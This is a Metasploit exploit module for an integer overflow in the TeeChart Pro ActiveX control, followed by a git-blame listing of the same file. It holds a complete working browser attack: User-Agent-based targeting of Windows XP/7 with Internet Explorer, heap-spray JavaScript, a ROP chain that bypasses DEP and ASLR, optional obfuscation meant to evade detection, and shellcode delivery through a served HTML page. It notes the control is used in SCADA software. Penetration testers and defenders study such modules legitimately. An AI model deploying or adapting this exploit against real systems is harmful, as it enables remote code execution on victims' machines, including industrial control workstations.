modules/exploits/windows/browser/teechart_pro.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super( update_info(info,
      'Name'           => 'TeeChart Professional ActiveX Control Trusted Integer Dereference',
      'Description'    => %q{
          This module exploits an integer overflow in TeeChart Pro ActiveX control. When
        sending an overly large/negative integer value to the AddSeries() property of
        TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the
        value and is later directly trusted and called upon.

        This module has been designed to bypass DEP only under IE8 with Java support. Multiple
        versions (including the latest version) are affected by this vulnerability that date
        back to as far as 2001.

        The following controls are vulnerable:

        TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);
        TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);
        TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);
        TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);
        TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).

        The controls are deployed under several SCADA based systems including:

        Unitronics OPC server v1.3;
        BACnet Operator Workstation Version 1.0.76
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          # twitter.com/net__ninja
          'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery/msf module
          'sinn3r', #Auto target, obfuscation, lots of testing
        ],
      'References'     =>
        [
          [ 'OSVDB', '74446'],
          [ 'URL', 'http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          # For exploitation we need to calculate a value for EDX:
          # <target address> - EAX / 4 = address to place in edx via signed integar
          # 0x0c0c0c0c - 0x023FB8F4 = 0x09CC5318 / 4 = 0x027314C6 = decimal: 41096390
          [
            'Windows XP SP0-SP3 (IE6/IE7)',
            {
              'Ret' => 0x027314C6
            }
          ],
          # Windows XP target + IE8 + JAVA = ASLR/DEP Bypass
          # 0x09442020- 0x0326B8F4 = 61D672C/4 = 18759CB
          [
            'Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)',
            {
              'Ret' => 0x014E59CB,
              # 0x09442020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x09441FF8
              # get back to the 2nd of rop.
              'Pivot' => 0x09441FF8
            }
          ],
          # Windows 7 target + IE8 + JAVA = ASLR/DEP Bypass
          # 0x16672020 - 0x040AB8F4/4 =  0x049719CB
          [
            'Windows 7 + JAVA + DEP bypass (IE8)',
            {
              'Ret' => 0x049719CB,
              # 0x16672020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x16671FF8
              # get back to the 2nd of rop.
              'Pivot' => 0x16671FF8
            }
          ]
        ],
      'DisclosureDate' => '2011-08-11',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])
      ])
  end

  def junk
    return rand_text_alpha(4).unpack("L")[0].to_i
  end

  def on_request_uri(cli, request)
    #Set target manually or automatically
    my_target = target
    if my_target.name == 'Automatic'
      agent = request.headers['User-Agent']
      if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
        my_target = targets[1]
      elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
        my_target = targets[1]
      elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
        my_target = targets[2]
      elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
        my_target = targets[3]
      end
    end

    vprint_status("Target selected: #{my_target.name}")

    # Re-generate the payload.
    return if ((p = regenerate_payload(cli)) == nil)

    # align stack
    retn = Rex::Text.to_unescape([0x7C3410C4].pack('V*'))
    pop_pop_retn = Rex::Text.to_unescape([0x7C3410C2].pack('V*'))

    # shellcode
    sc = Rex::Text.to_unescape(p.encoded)

    # Randomize object name
    obj_name  = rand_text_alpha(rand(100) + 1)
    main_sym  = 'main' #main function name

    randnop = rand_text_alpha(rand(100) + 1)

    if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
      js = <<-EOS
var sc = unescape('#{sc}');

var #{randnop} = "%u0c0c%u0c0c";
var nops = unescape(#{randnop});
var offset = 20;
var s = offset + sc.length;
while(nops.length < s) {
  nops += nops;
}
var chunk1 = nops.substring(0, s);
var chunk2 = nops.substring(0, nops.length - s);
while((chunk2.length + s) < 0x50000) {
  chunk2 = chunk2 + chunk2 + chunk1;
}
var blocks = new Array();
for(var counter=0; counter<200; counter++){
  blocks[counter] = chunk2 + sc;
}

function main()
{
  #{obj_name}.AddSeries(#{my_target.ret});
}
EOS
    end

    #http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
    if my_target.name =~ /IE8/
      # thanks to corelanc0d3r & mona.py :^) for the universal aslr/dep bypass (msvcr71.dll)
      # https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
      rop_gadgets = [
        my_target['Pivot'],# Pivot back EAX for ESP control
        0x7C342643,  # XCHG EAX,ESP; POP EDI; ; ADD BYTE PTR DS:[EAX],AL; POP ECX; RETN
        0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
        0x7c37a140,  # Make EAX readable
        0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
        0x41414141,  # EBP (filler)
        0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
        0x7c37a140,  # <- *&VirtualProtect()
        0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
        0x7c346c0b,  # Slide, so next gadget would write to correct stack location
        0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
        0x41414141,  # EDI (filler)
        0x41414141,  # will be patched at runtime (VP), then picked up into ESI
        0x41414141,  # EBX (filler)
        0x7c376402,  # POP EBP # RETN (msvcr71.dll)
        0x7c345c30,  # ptr to 'push esp #  ret ' (from MSVCR71.dll)
        0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
        0xfffffdff,  # size 0x00000201 -> ebx, modify if needed
        0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)
        0x7c354901,  # POP EBX # RETN (MSVCR71.dll)
        0xffffffff,  # pop value into ebx
        0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)
        0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
        0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)
        0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
        0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)
        0x7c34b8d8,  # ROP NOP (-> edi)
        0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)
        0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
        0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)
        0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
        0x90909090,  # NOPS (-> eax)
        0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
      ].pack('V*')

      rop = Rex::Text.to_unescape(rop_gadgets)

      custom_js = <<-EOF
      function heapspray(){
        var heapLib = new heapLib.ie(0x20000);
        var payload = unescape('#{rop}');
        payload += unescape('#{sc}');
        while(payload.length <= 0xffc) payload += unescape('#{retn}')
        while(payload.length < 0x1000) payload += unescape('#{pop_pop_retn}')
        var data = payload;
        while(data.length < 0x40000) data += data;
        var block = data.substring(2, 0x40000 - 0x21);
        for(var i = 0; i < 0x400; i++) {
          heapLib.alloc(block);
        }
      }

      function main(){
        heapspray();
        #{obj_name}.AddSeries(#{my_target.ret});
      }
      EOF

      js = heaplib(custom_js)

      #JS obfuscation on demand
      if datastore['OBFUSCATE']
        js = ::Rex::Exploitation::JSObfu.new(js)
        js.obfuscate(memory_sensitive: true)
        main_sym = js.sym('main')
      end
    end

    content = <<-EOF
    <object classid='clsid:FCB4B50A-E3F1-4174-BD18-54C3B3287258' id='#{obj_name}' ></object>
    <script language='JavaScript' defer>
    #{js}
    </script>
    <body onload="#{main_sym}();">
    <body>
    </html>
    EOF


    print_status("Sending #{self.name}")

    #Remove the extra tabs from content
    content = content.gsub(/^ {4}/, '')

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end
OCD fixes - Start of *.rb files 2017-07-13 23:53:59 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`Rank = NormalRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`def initialize(info = {})`
			`super( update_info(info,`
Add next chunk of fixes 2014-03-11 12:07:27 -05:00			`'Name' => 'TeeChart Professional ActiveX Control Trusted Integer Dereference',`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`'Description' => %q{`
80 pages left 2017-09-13 22:03:34 -04:00			`This module exploits an integer overflow in TeeChart Pro ActiveX control. When`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`sending an overly large/negative integer value to the AddSeries() property of`
80 pages left 2017-09-13 22:03:34 -04:00			`TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`value and is later directly trusted and called upon.`
Retab modules 2013-08-30 16:28:54 -05:00
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`This module has been designed to bypass DEP only under IE8 with Java support. Multiple`
			`versions (including the latest version) are affected by this vulnerability that date`
			`back to as far as 2001.`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`The following controls are vulnerable:`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);`
			`TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);`
			`TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);`
			`TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);`
			`TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`The controls are deployed under several SCADA based systems including:`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`Unitronics OPC server v1.3;`
			`BACnet Operator Workstation Version 1.0.76`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`# twitter.com/net__ninja`
			`'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery/msf module`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`'sinn3r', #Auto target, obfuscation, lots of testing`
big msftidy pass, ping me if there are issues 2011-10-23 11:56:13 +00:00			`],`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '74446'],`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`[ 'URL', 'http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
Fix #8002 , Use post/windows/manage/priv_migrate instead of migrate -f 2017-02-23 17:04:36 -06:00			`'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`},`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'BadChars' => "\x00",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Automatic', {} ],`
			`# For exploitation we need to calculate a value for EDX:`
			`# <target address> - EAX / 4 = address to place in edx via signed integar`
			`# 0x0c0c0c0c - 0x023FB8F4 = 0x09CC5318 / 4 = 0x027314C6 = decimal: 41096390`
			`[`
			`'Windows XP SP0-SP3 (IE6/IE7)',`
Msftidy: knocking out all those trailing spaces. Screw those guys. 2011-10-17 03:49:49 +00:00			`{`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`'Ret' => 0x027314C6`
			`}`
			`],`
			`# Windows XP target + IE8 + JAVA = ASLR/DEP Bypass`
			`# 0x09442020- 0x0326B8F4 = 61D672C/4 = 18759CB`
			`[`
			`'Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)',`
			`{`
			`'Ret' => 0x014E59CB,`
			`# 0x09442020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x09441FF8`
			`# get back to the 2nd of rop.`
			`'Pivot' => 0x09441FF8`
			`}`
			`],`
			`# Windows 7 target + IE8 + JAVA = ASLR/DEP Bypass`
Msftidy: knocking out all those trailing spaces. Screw those guys. 2011-10-17 03:49:49 +00:00			`# 0x16672020 - 0x040AB8F4/4 = 0x049719CB`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`[`
			`'Windows 7 + JAVA + DEP bypass (IE8)',`
Msftidy: knocking out all those trailing spaces. Screw those guys. 2011-10-17 03:49:49 +00:00			`{`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`'Ret' => 0x049719CB,`
			`# 0x16672020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x16671FF8`
			`# get back to the 2nd of rop.`
			`'Pivot' => 0x16671FF8`
			`}`
			`]`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2011-08-11',`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`register_options(`
			`[`
			`OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`def junk`
			`return rand_text_alpha(4).unpack("L")[0].to_i`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`def on_request_uri(cli, request)`
			`#Set target manually or automatically`
			`my_target = target`
			`if my_target.name == 'Automatic'`
			`agent = request.headers['User-Agent']`
			`if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/`
			`my_target = targets[1]`
			`elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/`
			`my_target = targets[1]`
			`elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/`
			`my_target = targets[2]`
			`elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/`
			`my_target = targets[3]`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
These modules should use vprint_xxx() instead of print_xxx() ... if datastore['VERBOSE'] 2012-01-30 13:08:35 -06:00			`vprint_status("Target selected: #{my_target.name}")`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`# Re-generate the payload.`
			`return if ((p = regenerate_payload(cli)) == nil)`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`# align stack`
			`retn = Rex::Text.to_unescape([0x7C3410C4].pack('V*'))`
			`pop_pop_retn = Rex::Text.to_unescape([0x7C3410C2].pack('V*'))`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`# shellcode`
			`sc = Rex::Text.to_unescape(p.encoded)`
Retab modules 2013-08-30 16:28:54 -05:00
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`# Randomize object name`
			`obj_name = rand_text_alpha(rand(100) + 1)`
			`main_sym = 'main' #main function name`
Retab modules 2013-08-30 16:28:54 -05:00
Avoid calling unescape on nops directly 2017-02-22 14:14:58 -05:00			`randnop = rand_text_alpha(rand(100) + 1)`

Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`if my_target.name =~ /IE6/ or my_target.name =~ /IE7/`
big msftidy pass, ping me if there are issues 2011-10-23 11:56:13 +00:00			`js = <<-EOS`
			`var sc = unescape('#{sc}');`

Avoid calling unescape on nops directly 2017-02-22 14:14:58 -05:00			`var #{randnop} = "%u0c0c%u0c0c";`
			`var nops = unescape(#{randnop});`
big msftidy pass, ping me if there are issues 2011-10-23 11:56:13 +00:00			`var offset = 20;`
			`var s = offset + sc.length;`
			`while(nops.length < s) {`
			`nops += nops;`
			`}`
			`var chunk1 = nops.substring(0, s);`
			`var chunk2 = nops.substring(0, nops.length - s);`
			`while((chunk2.length + s) < 0x50000) {`
			`chunk2 = chunk2 + chunk2 + chunk1;`
			`}`
			`var blocks = new Array();`
			`for(var counter=0; counter<200; counter++){`
			`blocks[counter] = chunk2 + sc;`
			`}`

			`function main()`
			`{`
			`#{obj_name}.AddSeries(#{my_target.ret});`
			`}`
			`EOS`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`#http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf`
			`if my_target.name =~ /IE8/`
			`# thanks to corelanc0d3r & mona.py :^) for the universal aslr/dep bypass (msvcr71.dll)`
			`# https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/`
			`rop_gadgets = [`
			`my_target['Pivot'],# Pivot back EAX for ESP control`
Msftidy: knocking out all those trailing spaces. Screw those guys. 2011-10-17 03:49:49 +00:00			`0x7C342643, # XCHG EAX,ESP; POP EDI; ; ADD BYTE PTR DS:[EAX],AL; POP ECX; RETN`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)`
			`0x7c37a140, # Make EAX readable`
			`0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)`
			`0x41414141, # EBP (filler)`
			`0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)`
			`0x7c37a140, # <- *&VirtualProtect()`
			`0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)`
			`0x7c346c0b, # Slide, so next gadget would write to correct stack location`
			`0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)`
			`0x41414141, # EDI (filler)`
			`0x41414141, # will be patched at runtime (VP), then picked up into ESI`
			`0x41414141, # EBX (filler)`
			`0x7c376402, # POP EBP # RETN (msvcr71.dll)`
			`0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)`
			`0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)`
			`0xfffffdff, # size 0x00000201 -> ebx, modify if needed`
			`0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)`
			`0x7c354901, # POP EBX # RETN (MSVCR71.dll)`
			`0xffffffff, # pop value into ebx`
			`0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)`
			`0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)`
			`0x7c34d201, # POP ECX # RETN (MSVCR71.dll)`
			`0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)`
			`0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)`
			`0x7c34b8d8, # ROP NOP (-> edi)`
			`0x7c344f87, # POP EDX # RETN (MSVCR71.dll)`
			`0xffffffc0, # value to negate, target value : 0x00000040, target: edx`
			`0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)`
			`0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)`
			`0x90909090, # NOPS (-> eax)`
			`0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)`
			`].pack('V*')`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`rop = Rex::Text.to_unescape(rop_gadgets)`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`custom_js = <<-EOF`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`function heapspray(){`
missing var 2011-08-13 02:05:08 +00:00			`var heapLib = new heapLib.ie(0x20000);`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`var payload = unescape('#{rop}');`
			`payload += unescape('#{sc}');`
			`while(payload.length <= 0xffc) payload += unescape('#{retn}')`
			`while(payload.length < 0x1000) payload += unescape('#{pop_pop_retn}')`
			`var data = payload;`
			`while(data.length < 0x40000) data += data;`
			`var block = data.substring(2, 0x40000 - 0x21);`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`for(var i = 0; i < 0x400; i++) {`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`heapLib.alloc(block);`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`}`
			`}`
Retab modules 2013-08-30 16:28:54 -05:00
Msftidy: knocking out all those trailing spaces. Screw those guys. 2011-10-17 03:49:49 +00:00			`function main(){`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`heapspray();`
			`#{obj_name}.AddSeries(#{my_target.ret});`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`}`
			`EOF`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`js = heaplib(custom_js)`
Retab modules 2013-08-30 16:28:54 -05:00
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`#JS obfuscation on demand`
			`if datastore['OBFUSCATE']`
			`js = ::Rex::Exploitation::JSObfu.new(js)`
Avoid String.fromCharCode which gets detected 2017-02-22 14:13:18 -05:00			`js.obfuscate(memory_sensitive: true)`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`main_sym = js.sym('main')`
			`end`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`content = <<-EOF`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`<object classid='clsid:FCB4B50A-E3F1-4174-BD18-54C3B3287258' id='#{obj_name}' ></object>`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`<script language='JavaScript' defer>`
			`#{js}`
			`</script>`
Improve javascript obfuscation, and allow it as an option 2011-08-12 23:03:11 +00:00			`<body onload="#{main_sym}();">`
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`<body>`
			`</html>`
			`EOF`
Retab modules 2013-08-30 16:28:54 -05:00

Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status("Sending #{self.name}")`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`#Remove the extra tabs from content`
Make gsubs compliant with the new indentation standard 2013-12-31 11:06:53 -06:00			`content = content.gsub(/^ {4}/, '')`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`# Transmit the response to the client`
			`send_response_html(cli, content)`
Retab modules 2013-08-30 16:28:54 -05:00
Add TeeChart Professional ActiveX exploit 2011-08-11 08:41:30 +00:00			`# Handle the payload`
			`handler(cli)`
			`end`
			`end`